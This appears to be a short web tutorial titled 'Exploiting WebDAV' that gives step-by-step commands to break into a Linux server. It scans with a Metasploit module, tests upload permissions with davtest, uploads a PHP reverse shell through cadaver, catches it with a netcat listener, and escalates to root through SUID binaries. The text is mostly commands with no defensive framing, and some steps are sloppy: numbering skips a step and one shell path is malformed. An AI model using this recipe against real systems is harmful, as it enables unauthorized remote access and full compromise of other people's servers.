Exploiting WebDAV

Getting a remote shell on a Linux system

Step 1: Scan for Weaknesses with Metasploit

  1. Open Metasploit:
  2. $msfconsole
  3. Search for WebDAV modules:
  4. $search webdav
  5. Load the webdav_scanner:
  6. $use auxiliary/scanner/http/webdav_scanner
  7. Set path to /dav/:
  8. $set path /dav/
  9. Set target IP:
  10. $set RHOSTS
  11. Execute:
  12. exploit

Step 2: Asses File Permissions Using DAVTest

  1. Run davtest:
  2. $davtest -url
  3. Check for successful directory creation and file uploads

Step 3: Upload with Cadaver

  1. Connect via cadaver:
  2. $cadaver
  3. Test with a file:
  4. $put test.txt
  5. Use and configre a php reverse shell using webshells:
  6. $webshells
  7. Configure IP and port on your reverse shell
  8. Upload a PHP reverse shell:
  9. $put php-reverse-shell.php
Step 5: Catch the Shell

  1. Start a listener on the same port as the reverse shell uses:
  2. $nc -lvnp 5555

Step 6: Privilege Escalation

  1. Explore methods such as kernel exploits, misconfigs, and programs running with root level privs
  2. You can use the tool LinEnum to check for any methodsLinEnum
  3. Identify SUID files
  4. Execute a privileged process to spwan root shell:
  5. $./path/to/suid_executable -c "/bin/bash/"

You should now have root level access

We use cookies to improve your experience. By using our site, you agree to our Privacy Policy.